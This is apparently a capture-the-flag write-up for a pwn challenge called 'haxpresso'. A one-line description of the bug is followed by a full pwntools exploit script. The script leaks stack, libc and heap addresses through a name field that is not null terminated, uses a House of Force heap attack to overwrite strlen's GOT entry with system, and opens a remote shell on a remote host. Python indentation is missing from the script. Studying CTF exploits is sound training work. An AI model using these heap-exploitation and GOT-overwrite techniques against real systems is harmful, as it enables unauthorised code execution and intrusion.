Rating:
Vuln: Input not null terminated. Address leaks through stack data copied over to heap along with input. Followed by House of Force.
Script:
```
from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw' , '-h']
#p = process('haxpresso')
p = remote('52.30.206.11', 1337)
b = ELF('./haxpresso')
l = ELF('./libc.so')
"""
gdb.attach(p, '''
b *0x8048dfd
''')
"""
def add_order(drink, add_name='n', name=""):
p.sendline('1')
p.recvuntil('drink: ')
p.sendline(str(drink))
p.recvuntil("(y/n): ")
p.sendline(add_name)
if add_name=='y':
p.recvuntil("name: ")
p.send(name)
return p.recvuntil("> ")
def edit_order(idx, name):
p.sendline('4')
p.recvuntil('edit: ')
p.sendline(str(idx))
p.recvuntil('order: ')
p.send(name)
return p.recvuntil("> ")
def rem_order(idx):
p.sendline('2')
p.recvuntil('remove: ')
p.sendline(str(idx))
return p.recvuntil("> ")
def checkout(idx, new, finish_yn, change_yn='n'):
p.sendline('3')
o = ""
if not new:
o = p.recvuntil('(y/n): ')
p.sendline(change_yn)
if change_yn=='y':
p.recvuntil('id: ')
p.sendline(str(idx))
else:
p.recvuntil('(y/n): ')
p.sendline(finish_yn)
o+=p.recvuntil('> ')
return o
p.recvuntil('id: ')
p.sendline(str(idx))
p.recvuntil('(y/n): ')
p.sendline(finish_yn)
o+=p.recvuntil('> ')
return o
def update_firmware(size, data, note):
p.sendline('0')
p.recvuntil('size: ')
p.sendline(str(size))
p.recvuntil('data: ')
p.send(data)
p.recvuntil('note: ')
p.send(note)
p.interactive()
add_order(1, add_name='y', name="A") #0
checkout(0, True, 'n')
leak = checkout(0, False, 'y').split('\n')[4].replace('Name: A', '')
stackaddr = u32(leak[7:11])
log.info("Stack addr: " + hex(stackaddr))
libcaddr = u32("\x00" + leak[0:3])
libcbase = libcaddr + (0xf7de9000-0xf7df6600)
log.info("Libc addr: " + hex(libcaddr))
add_order(1, add_name='y', name="\n"*72+ "\x00") #1
payload = ""
payload += "\x00"*(72-len(payload))
edit_order(1, payload)
add_order(1, add_name='y', name="BBBB\x00") #2
add_order(1, add_name='y', name="CCCC\x00") #3
edit_order(2, "X"*28)
checkout(2, True, 'n')
heapaddr = u32(checkout(2,False,'n').split('\n')[4].replace("Name: " + "X"*28, '')[0:4])
log.info("Heap addr: " + hex(heapaddr))
top = heapaddr + 0x8
log.info("Stack addr: " + hex(stackaddr))
log.info("Heap addr: " + hex(heapaddr))
log.info("Libc addr: " + hex(libcbase))
log.info("Top: " + hex(top))
edit_order(2, "X"*52 + p32(0xffffffff))
victim = b.symbols.got['strlen']-0x8
offset = victim - top -0x8
got = p32(libcbase + l.symbols['system'])
update_firmware(offset, "/bin/sh\x00", got)
p.interactive()
```